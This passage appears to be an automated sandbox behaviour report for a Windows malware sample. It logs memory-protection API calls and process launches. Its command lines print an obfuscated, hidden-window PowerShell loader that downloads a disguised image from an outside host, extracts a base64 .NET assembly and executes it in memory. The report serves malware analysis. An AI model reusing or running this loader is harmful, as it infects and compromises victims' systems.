length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2624
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2624
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2624
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2624
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2712
region_size: 659456
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002630000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2712
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000026d0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2712
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2712
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2712
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2712
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2712
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2712
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2712
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769cd000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2712
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769f2000
process_handle: 0xffffffffffffffff
1 0 0
file C:\Users\test22\Desktop\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LgAgACgAIAAkAFAAUwBoAE8AbQBlAFsANABdACsAJABwAFMASABvAE0ARQBbADMANABdACsAJwBYACcAKQAoACgAKAAnAHsAMQB9AGkAbQBhAGcAZQBVAHIAbAAgAD0AIAB7ADAAfQBoAHQAdABwAHMAOgAvAC8AdQBwAGwAbwBhAGQAZABlAGkAbQBhAGcAZQBuAHMALgBjAG8AJwArACcAbQAuAGIAcgAvAGkAbQBhAGcAZQBzAC8AMAAwADQALwA2ADYANwAvADYAMAA4AC8AbwByAGkAZwBpAG4AYQBsAC8AaAB0AGEALgBqAHAAZwA/ADEANwAwADAAMgA2ADgAOAA0ADAAewAwAH0AOwB7ADEAfQB3AGUAYgBDAGwAaQBlAG4AJwArACcAdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQAnACsAJwBiAEMAbABpAGUAbgB0ADsAewAxAH0AaQBtAGEAZwBlAEIAeQB0AGUAcwAnACsAJwAgAD0AIAB7ADEAfQB3AGUAYgBDAGwAaQBlAG4AdAAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAewAxAH0AaQBtAGEAZwAnACsAJwBlAFUAcgBsACkAOwB7ADEAfQBpAG0AYQBnACcAKwAnAGUAVABlAHgAdAAgAD0AIAAnACsAJwBbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAB7ADEAfQBpAG0AYQBnACcAKwAnAGUAQgB5AHQAZQBzACkAOwB7ADEAfQBzAHQAYQByAHQARgBsAGEAZwAgAD0AIAB7ADAAfQA8ADwAQgBBAFMARQA2ADQAXwBTAFQAQQBSAFQAPgA+AHsAMAB9ADsAewAxAH0AZQBuAGQARgBsAGEAZwAgAD0AIAB7ADAAfQA8ADwAQgBBAFMARQA2ADQAXwBFAE4ARAAnACsAJwA+AD4AewAwAH0AOwB7ADEAfQBzAHQAYQByAHQASQBuAGQAZQB4ACAAPQAgAHsAMQB9AGkAbQBhAGcAZQBUAGUAeAAnACsAJwB0AC4ASQBuAGQAZQAnACsAJwB4AE8AZgAoAHsAMQB9AHMAdABhAHIAdABGAGwAYQBnACkAOwB7ACcAKwAnADEAfQBlAG4AZABJAG4AZABlAHgAIAA9ACAAewAxAH0AaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgAewAxACcAKwAnAH0AJwArACcAZQBuAGQARgBsAGEAZwApADsAewAxAH0AcwAnACsAJwB0AGEAcgB0AEkAbgAnACsAJwBkAGUAeAAgAC0AZwBlACAAMAAgAC0AYQBuAGQAIAB7ADEAfQBlACcAKwAnAG4AZABJAG4AZABlAHgAIAAtAGcAdAAgAHsAMQB9AHMAdABhAHIAdABJAG4AZABlAHgAOwB7ADEAfQBzAHQAYQAnACsAJwByAHQASQBuAGQAZQB4ACAAKwA9ACAAewAxAH0AJwArACcAcwB0AGEAJwArACcAcgAnACsAJwB0AEYAbABhAGcALgBMAGUAbgBnAHQAaAA7AHsAMQB9AGIAYQBzAGUANgA0AEwAZQBuAGcAdABoACAAPQAgAHsAMQB9AGUAbgAnACsAJwBkAEkAbgBkAGUAeAAgAC0AIAB7ADEAfQBzAHQAYQByAHQASQBuAGQAZQB4ADsAewAxAH0AYgBhAHMAZQA2ADQAQwBvAG0AbQBhACcAKwAnAG4AZAAgAD0AIAB7ADEAfQBpAG0AJwArACcAYQBnAGUAVABlAHgAdAAuAFMAdQBiAHMAdAByAGkAbgBnACgAewAxAH0AcwB0AGEAcgB0AEkAJwArACcAbgBkAGUAeAAsACAAewAxAH0AYgBhAHMAZQA2ADQATABlAG4AZwB0AGgAKQA7AHsAMQB9AGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACAAPQAgAFsAUwB5AHMAdAAnACsAJwBlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAB7ADEAfQBiAGEAcwBlADYANABDACcAKwAnAG8AbQBtAGEAbgBkACkAOwB7ADEAfQBsAG8AYQBkAGUAZABBAHMAcwBlAG0AYgBsAHkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvACcAKwAnAGEAZAAoAHsAMQB9AGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACkAOwB7ADEAfQB0AHkAcABlACAAPQAgAHsAMQB9AGwAbwBhAGQAZQBkAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAB7ADAAfQBGAGkAYgBlAHIALgBIAG8AbQBlAHsAMAB9ACkAOwB7ADEAfQBtAGUAdABoAG8AZAAgAD0AIAB7ADEAfQB0AHkAcABlAC4ARwBlAHQATQBlAHQAaABvAGQAKAB7ADAAfQBWAEEASQB7ADAAfQApAC4ASQBuAHYAbwBrAGUAKAB7ADEAfQBuAHUAbABsACwAIABbAG8AYgBqAGUAYwB0AFsAXQBdACAAKAB7ADAAfQBNAGoAUQB3AFkAMgBZAHoAWgBEAEUANQBPAFQAQgBoAEwAVwBFADEAWQBtAEUAdABaAFQARQB4ACcAKwAnAE4AQwAwAHoATQBXAE0ANABMAFQAWQAnACsAJwB4AE0ARAAnACsAJwBZADEATwBEAEkAeABQAFcANQBsAGEAMgA5ADAASgBtAEYAcABaAEcAVgB0AFAAWABSAHMAWQBUADkAMABlAEgAUQB1AE4ARABaAGwAYwAyAEYAaQBjAEcAOQBqAGMAMgBWAHoAZQBXADAAdgBiAHkAOQB0ACcAKwAnAGIAMgBNAHUAZABHADkAdwBjADMAQgB3AFkAUwA0ADIATgBHAEUAeABNAGkAMQBrAGEAVwA5AHkAWgBDADkAJwArACcAaQBMAHoAQgAyAEwAMgAxAHYAWQB5ADUAegBhAFgAQgBoAFoAVwB4AG4AYgAyADkAbgBMAG0AVgBuAFkAWABKAHYAZABIAE4AbABjADIARgBpAFoAWABKAHAAWgBpADgAdgBPAG4ATgB3AGQASAAnACsAJwBSAG8AewAwAH0AIAAsACAAewAwAH0AZABmAGQAZgBkAHsAMAB9ACAALAAgAHsAMAB9AGQAZgBkAGYAewAwAH0AIAAsACAAewAwAH0AZABmAGQAZgB7ADAAfQAgACwAIAB7ADAAfQBkAGEAZABzAGEAewAwAH0AIAAsACAAewAnACsAJwAwAH0AZABlAHsAMAB9ACAALAAgAHsAMAB9AGMAdQB7ADAAfQApACcAKwAnACkAJwApAC0AZgAgACAAWwBDAEgAYQBSAF0AMwA5ACwAWwBDAEgAYQBSAF0AMwA2ACkAIAApAA==';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
cmdline powershell -command $Codigo = 'LgAgACgAIAAkAFAAUwBoAE8AbQBlAFsANABdACsAJABwAFMASABvAE0ARQBbADMANABdACsAJwBYACcAKQAoACgAKAAnAHsAMQB9AGkAbQBhAGcAZQBVAHIAbAAgAD0AIAB7ADAAfQBoAHQAdABwAHMAOgAvAC8AdQBwAGwAbwBhAGQAZABlAGkAbQBhAGcAZQBuAHMALgBjAG8AJwArACcAbQAuAGIAcgAvAGkAbQBhAGcAZQBzAC8AMAAwADQALwA2ADYANwAvADYAMAA4AC8AbwByAGkAZwBpAG4AYQBsAC8AaAB0AGEALgBqAHAAZwA/ADEANwAwADAAMgA2ADgAOAA0ADAAewAwAH0AOwB7ADEAfQB3AGUAYgBDAGwAaQBlAG4AJwArACcAdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQAnACsAJwBiAEMAbABpAGUAbgB0ADsAewAxAH0AaQBtAGEAZwBlAEIAeQB0AGUAcwAnACsAJwAgAD0AIAB7ADEAfQB3AGUAYgBDAGwAaQBlAG4AdAAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAewAxAH0AaQBtAGEAZwAnACsAJwBlAFUAcgBsACkAOwB7ADEAfQBpAG0AYQBnACcAKwAnAGUAVABlAHgAdAAgAD0AIAAnACsAJwBbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAB7ADEAfQBpAG0AYQBnACcAKwAnAGUAQgB5AHQAZQBzACkAOwB7ADEAfQBzAHQAYQByAHQARgBsAGEAZwAgAD0AIAB7ADAAfQA8ADwAQgBBAFMARQA2ADQAXwBTAFQAQQBSAFQAPgA+AHsAMAB9ADsAewAxAH0AZQBuAGQARgBsAGEAZwAgAD0AIAB7ADAAfQA8ADwAQgBBAFMARQA2ADQAXwBFAE4ARAAnACsAJwA+AD4AewAwAH0AOwB7ADEAfQBzAHQAYQByAHQASQBuAGQAZQB4ACAAPQAgAHsAMQB9AGkAbQBhAGcAZQBUAGUAeAAnACsAJwB0AC4ASQBuAGQAZQAnACsAJwB4AE8AZgAoAHsAMQB9AHMAdABhAHIAdABGAGwAYQBnACkAOwB7ACcAKwAnADEAfQBlAG4AZABJAG4AZABlAHgAIAA9ACAAewAxAH0AaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgAewAxACcAKwAnAH0AJwArACcAZQBuAGQARgBsAGEAZwApADsAewAxAH0AcwAnACsAJwB0AGEAcgB0AEkAbgAnACsAJwBkAGUAeAAgAC0AZwBlACAAMAAgAC0AYQBuAGQAIAB7ADEAfQBlACcAKwAnAG4AZABJAG4AZABlAHgAIAAtAGcAdAAgAHsAMQB9AHMAdABhAHIAdABJAG4AZABlAHgAOwB7ADEAfQBzAHQAYQAnACsAJwByAHQASQBuAGQAZQB4ACAAKwA9ACAAewAxAH0AJwArACcAcwB0AGEAJwArACcAcgAnACsAJwB0AEYAbABhAGcALgBMAGUAbgBnAHQAaAA7AHsAMQB9AGIAYQBzAGUANgA0AEwAZQBuAGcAdABoACAAPQAgAHsAMQB9AGUAbgAnACsAJwBkAEkAbgBkAGUAeAAgAC0AIAB7ADEAfQBzAHQAYQByAHQASQBuAGQAZQB4ADsAewAxAH0AYgBhAHMAZQA2ADQAQwBvAG0AbQBhACcAKwAnAG4AZAAgAD0AIAB7ADEAfQBpAG0AJwArACcAYQBnAGUAVABlAHgAdAAuAFMAdQBiAHMAdAByAGkAbgBnACgAewAxAH0AcwB0AGEAcgB0AEkAJwArACcAbgBkAGUAeAAsACAAewAxAH0AYgBhAHMAZQA2ADQATABlAG4AZwB0AGgAKQA7AHsAMQB9AGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACAAPQAgAFsAUwB5AHMAdAAnACsAJwBlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAB7ADEAfQBiAGEAcwBlADYANABDACcAKwAnAG8AbQBtAGEAbgBkACkAOwB7ADEAfQBsAG8AYQBkAGUAZABBAHMAcwBlAG0AYgBsAHkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvACcAKwAnAGEAZAAoAHsAMQB9AGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACkAOwB7ADEAfQB0AHkAcABlACAAPQAgAHsAMQB9AGwAbwBhAGQAZQBkAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAB7ADAAfQBGAGkAYgBlAHIALgBIAG8AbQBlAHsAMAB9ACkAOwB7ADEAfQBtAGUAdABoAG8AZAAgAD0AIAB7ADEAfQB0AHkAcABlAC4ARwBlAHQATQBlAHQAaABvAGQAKAB7ADAAfQBWAEEASQB7ADAAfQApAC4ASQBuAHYAbwBrAGUAKAB7ADEAfQBuAHUAbABsACwAIABbAG8AYgBqAGUAYwB0AFsAXQBdACAAKAB7ADAAfQBNAGoAUQB3AFkAMgBZAHoAWgBEAEUANQBPAFQAQgBoAEwAVwBFADEAWQBtAEUAdABaAFQARQB4ACcAKwAnAE4AQwAwAHoATQBXAE0ANABMAFQAWQAnACsAJwB4AE0ARAAnACsAJwBZADEATwBEAEkAeABQAFcANQBsAGEAMgA5ADAASgBtAEYAcABaAEcAVgB0AFAAWABSAHMAWQBUADkAMABlAEgAUQB1AE4ARABaAGwAYwAyAEYAaQBjAEcAOQBqAGMAMgBWAHoAZQBXADAAdgBiAHkAOQB0ACcAKwAnAGIAMgBNAHUAZABHADkAdwBjADMAQgB3AFkAUwA0ADIATgBHAEUAeABNAGkAMQBrAGEAVwA5AHkAWgBDADkAJwArACcAaQBMAHoAQgAyAEwAMgAxAHYAWQB5ADUAegBhAFgAQgBoAFoAVwB4AG4AYgAyADkAbgBMAG0AVgBuAFkAWABKAHYAZABIAE4AbABjADIARgBpAFoAWABKAHAAWgBpADgAdgBPAG4ATgB3AGQASAAnACsAJwBSAG8AewAwAH0AIAAsACAAewAwAH0AZABmAGQAZgBkAHsAMAB9ACAALAAgAHsAMAB9AGQAZgBkAGYAewAwAH0AIAAsACAAewAwAH0AZABmAGQAZgB7ADAAfQAgACwAIAB7ADAAfQBkAGEAZABzAGEAewAwAH0AIAAsACAAewAnACsAJwAwAH0AZABlAHsAMAB9ACAALAAgAHsAMAB9AGMAdQB7ADAAfQApACcAKwAnACkAJwApAC0AZgAgACAAWwBDAEgAYQBSAF0AMwA5ACwAWwBDAEgAYQBSAF0AMwA2ACkAIAApAA==';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $PShOme[4]+$pSHoME[34]+'X')((('{1}imageUrl = {0}https://uploaddeimagens.co'+'m.br/images/004/667/608/original/hta.jpg?1700268840{0};{1}webClien'+'t = New-Object System.Net.We'+'bClient;{1}imageBytes'+' = {1}webClient.DownloadData({1}imag'+'eUrl);{1}imag'+'eText = '+'[System.Text.Encoding]::UTF8.GetString({1}imag'+'eBytes);{1}startFlag = {0}<<BASE64_START>>{0};{1}endFlag = {0}<<BASE64_END'+'>>{0};{1}startIndex = {1}imageTex'+'t.Inde'+'xOf({1}startFlag);{'+'1}endIndex = {1}imageText.IndexOf({1'+'}'+'endFlag);{1}s'+'tartIn'+'dex -ge 0 -and {1}e'+'ndIndex -gt {1}startIndex;{1}sta'+'rtIndex += {1}'+'sta'+'r'+'tFlag.Length;{1}base64Length = {1}en'+'dIndex - {1}startIndex;{1}base64Comma'+'nd = {1}im'+'ageText.Substring({1}startI'+'ndex, {1}base64Length);{1}commandBytes = [Syst'+'em.Convert]::FromBase64String({1}base64C'+'ommand);{1}loadedAssembly = [System.Reflection.Assembly]::Lo'+'ad({1}commandBytes);{1}type = {1}loadedAssembly.GetType({0}Fiber.Home{0});{1}method = {1}type.GetMethod({0}VAI{0}).Invoke({1}null, [object[]] ({0}MjQwY2YzZDE5OTBhLWE1YmEtZTEx'+'NC0zMWM4LTY'+'xMD'+'Y1ODIxPW5la290JmFpZGVtPXRsYT90eHQuNDZlc2FicG9jc2VzeW0vby9t'+'b2MudG9wc3BwYS42NGExMi1kaW9yZC9'+'iLzB2L21vYy5zaXBhZWxnb29nLmVnYXJvdHNlc2FiZXJpZi8vOnNwdH'+'Ro{0} , {0}dfdfd{0} , {0}dfdf{0} , {0}dfdf{0} , {0}dadsa{0} , {'+'0}de{0} , {0}cu{0})'+')')-f [CHaR]39,[CHaR]36) )"
Time & API Arguments Status Return Repeated

CreateProcessInternalW

 thread_identifier: 2948
thread_handle: 0x00000000000004d4
process_identifier: 2944
current_directory: C:\Users\test22\Desktop
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LgAgACgAIAAkAFAAUwBoAE8AbQBlAFsANABdACsAJABwAFMASABvAE0ARQBbADMANABdACsAJwBYACcAKQAoACgAKAAnAHsAMQB9AGkAbQBhAGcAZQBVAHIAbAAgAD0AIAB7ADAAfQBoAHQAdABwAHMAOgAvAC8AdQBwAGwAbwBhAGQAZABlAGkAbQBhAGcAZQBuAHMALgBjAG8AJwArACcAbQAuAGIAcgAvAGkAbQBhAGcAZQBzAC8AMAAwADQALwA2ADYANwAvADYAMAA4AC8AbwByAGkAZwBpAG4AYQBsAC8AaAB0AGEALgBqAHAAZwA/ADEANwAwADAAMgA2ADgAOAA0ADAAewAwAH0AOwB7ADEAfQB3AGUAYgBDAGwAaQBlAG4AJwArACcAdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQAnACsAJwBiAEMAbABpAGUAbgB0ADsAewAxAH0AaQBtAGEAZwBlAEIAeQB0AGUAcwAnACsAJwAgAD0AIAB7ADEAfQB3AGUAYgBDAGwAaQBlAG4AdAAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAewAxAH0AaQBtAGEAZwAnACsAJwBlAFUAcgBsACkAOwB7ADEAfQBpAG0AYQBnACcAKwAnAGUAVABlAHgAdAAgAD0AIAAnACsAJwBbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAB7ADEAfQBpAG0AYQBnACcAKwAnAGUAQgB5AHQAZQBzACkAOwB7ADEAfQBzAHQAYQByAHQARgBsAGEAZwAgAD0AIAB7ADAAfQA8ADwAQgBBAFMARQA2ADQAXwBTAFQAQQBSAFQAPgA+AHsAMAB9ADsAewAxAH0AZQBuAGQARgBsAGEAZwAgAD0AIAB7ADAAfQA8ADwAQgBBAFMARQA2ADQAXwBFAE4ARAAnACsAJwA+AD4AewAwAH0AOwB7ADEAfQBzAHQAYQByAHQASQBuAGQAZQB4ACAAPQAgAHsAMQB9AGkAbQBhAGcAZQBUAGUAeAAnACsAJwB0AC4ASQBuAGQAZQAnACsAJwB4AE8AZgAoAHsAMQB9AHMAdABhAHIAdABGAGwAYQBnACkAOwB7ACcAKwAnADEAfQBlAG4AZABJAG4AZABlAHgAIAA9ACAAewAxAH0AaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgAewAxACcAKwAnAH0AJwArACcAZQBuAGQARgBsAGEAZwApADsAewAxAH0AcwAnACsAJwB0AGEAcgB0AEkAbgAnACsAJwBkAGUAeAAgAC0AZwBlACAAMAAgAC0AYQBuAGQAIAB7ADEAfQBlACcAKwAnAG4AZABJAG4AZABlAHgAIAAtAGcAdAAgAHsAMQB9AHMAdABhAHIAdABJAG4AZABlAHgAOwB7ADEAfQBzAHQAYQAnACsAJwByAHQASQBuAGQAZQB4ACAAKwA9ACAAewAxAH0AJwArACcAcwB0AGEAJwArACcAcgAnACsAJwB0AEYAbABhAGcALgBMAGUAbgBnAHQAaAA7AHsAMQB9AGIAYQBzAGUANgA0AEwAZQBuAGcAdABoACAAPQAgAHsAMQB9AGUAbgAnACsAJwBkAEkAbgBkAGUAeAAgAC0AIAB7ADEAfQBzAHQAYQByAHQASQBuAGQAZQB4ADsAewAxAH0AYgBhAHMAZQA2ADQAQwBvAG0AbQBhACcAKwAnAG4AZAAgAD0AIAB7ADEAfQBpAG0AJwArACcAYQBnAGUAVABlAHgAdAAuAFMAdQBiAHMAdAByAGkAbgBnACgAewAxAH0AcwB0AGEAcgB0AEkAJwArACcAbgBkAGUAeAAsACAAewAxAH0AYgBhAHMAZQA2ADQATABlAG4AZwB0AGgAKQA7AHsAMQB9AGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACAAPQAgAFsAUwB5AHMAdAAnACsAJwBlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAB7ADEAfQBiAGEAcwBlADYANABDACcAKwAnAG8AbQBtAGEAbgBkACkAOwB7ADEAfQBsAG8AYQBkAGUAZABBAHMAcwBlAG0AYgBsAHkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvACcAKwAnAGEAZAAoAHsAMQB9AGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACkAOwB7ADEAfQB0AHkAcABlACAAPQAgAHsAMQB9AGwAbwBhAGQAZQBkAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAB7ADAAfQBGAGkAYgBlAHIALgBIAG8AbQBlAHsAMAB9ACkAOwB7ADEAfQBtAGUAdABoAG8AZAAgAD0AIAB7ADEAfQB0AHkAcABlAC4ARwBlAHQATQBlAHQAaABvAGQAKAB7ADAAfQBWAEEASQB7ADAAfQApAC4ASQBuAHYAbwBrAGUAKAB7ADEAfQBuAHUAbABsACwAIABbAG8AYgBqAGUAYwB0AFsAXQBdACAAKAB7ADAAfQBNAGoAUQB3AFkAMgBZAHoAWgBEAEUANQBPAFQAQgBoAEwAVwBFADEAWQBtAEUAdABaAFQARQB4ACcAKwAnAE4AQwAwAHoATQBXAE0ANABMAFQAWQAnACsAJwB4AE0ARAAnACsAJwBZADEATwBEAEkAeABQAFcANQBsAGEAMgA5ADAASgBtAEYAcABaAEcAVgB0AFAAWABSAHMAWQBUADkAMABlAEgAUQB1AE4ARABaAGwAYwAyAEYAaQBjAEcAOQBqAGMAMgBWAHoAZQBXADAAdgBiAHkAOQB0ACcAKwAnAGIAMgBNAHUAZABHADkAdwBjADMAQgB3AFkAUwA0ADIATgBHAEUAeABNAGkAMQBrAGEAVwA5AHkAWgBDADkAJwArACcAaQBMAHoAQgAyAEwAMgAxAHYAWQB5ADUAegBhAFgAQgBoAFoAVwB4AG4AYgAyADkAbgBMAG0AVgBuAFkAWABKAHYAZABIAE4AbABjADIARgBpAFoAWABKAHAAWgBpADgAdgBPAG4ATgB3AGQASAAnACsAJwBSAG8AewAwAH0AIAAsACAAewAwAH0AZABmAGQAZgBkAHsAMAB9ACAALAAgAHsAMAB9AGQAZgBkAGYAewAwAH0AIAAsACAAewAwAH0AZABmAGQAZgB7ADAAfQAgACwAIAB7ADAAfQBkAGEAZABzAGEAewAwAH0AIAAsACAAewAnACsAJwAwAH0AZABlAHsAMAB9ACAALAAgAHsAMAB9AGMAdQB7ADAAfQApACcAKwAnACkAJwApAC0AZgAgACAAWwBDAEgAYQBSAF0AMwA5ACwAWwBDAEgAYQBSAF0AMwA2ACkAIAApAA==';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000000000004cc
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: powershell
parameters: -command $Codigo = 'LgAgACgAIAAkAFAAUwBoAE8AbQBlAFsANABdACsAJABwAFMASABvAE0ARQBbADMANABdACsAJwBYACcAKQAoACgAKAAnAHsAMQB9AGkAbQBhAGcAZQBVAHIAbAAgAD0AIAB7ADAAfQBoAHQAdABwAHMAOgAvAC8AdQBwAGwAbwBhAGQAZABlAGkAbQBhAGcAZQBuAHMALgBjAG8AJwArACcAbQAuAGIAcgAvAGkAbQBhAGcAZQBzAC8AMAAwADQALwA2ADYANwAvADYAMAA4AC8AbwByAGkAZwBpAG4AYQBsAC8AaAB0AGEALgBqAHAAZwA/ADEANwAwADAAMgA2ADgAOAA0ADAAewAwAH0AOwB7ADEAfQB3AGUAYgBDAGwAaQBlAG4AJwArACcAdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQAnACsAJwBiAEMAbABpAGUAbgB0ADsAewAxAH0AaQBtAGEAZwBlAEIAeQB0AGUAcwAnACsAJwAgAD0AIAB7ADEAfQB3AGUAYgBDAGwAaQBlAG4AdAAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAewAxAH0AaQBtAGEAZwAnACsAJwBlAFUAcgBsACkAOwB7ADEAfQBpAG0AYQBnACcAKwAnAGUAVABlAHgAdAAgAD0AIAAnACsAJwBbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAB7ADEAfQBpAG0AYQBnACcAKwAnAGUAQgB5AHQAZQBzACkAOwB7ADEAfQBzAHQAYQByAHQARgBsAGEAZwAgAD0AIAB7ADAAfQA8ADwAQgBBAFMARQA2ADQAXwBTAFQAQQBSAFQAPgA+AHsAMAB9ADsAewAxAH0AZQBuAGQARgBsAGEAZwAgAD0AIAB7ADAAfQA8ADwAQgBBAFMARQA2ADQAXwBFAE4ARAAnACsAJwA+AD4AewAw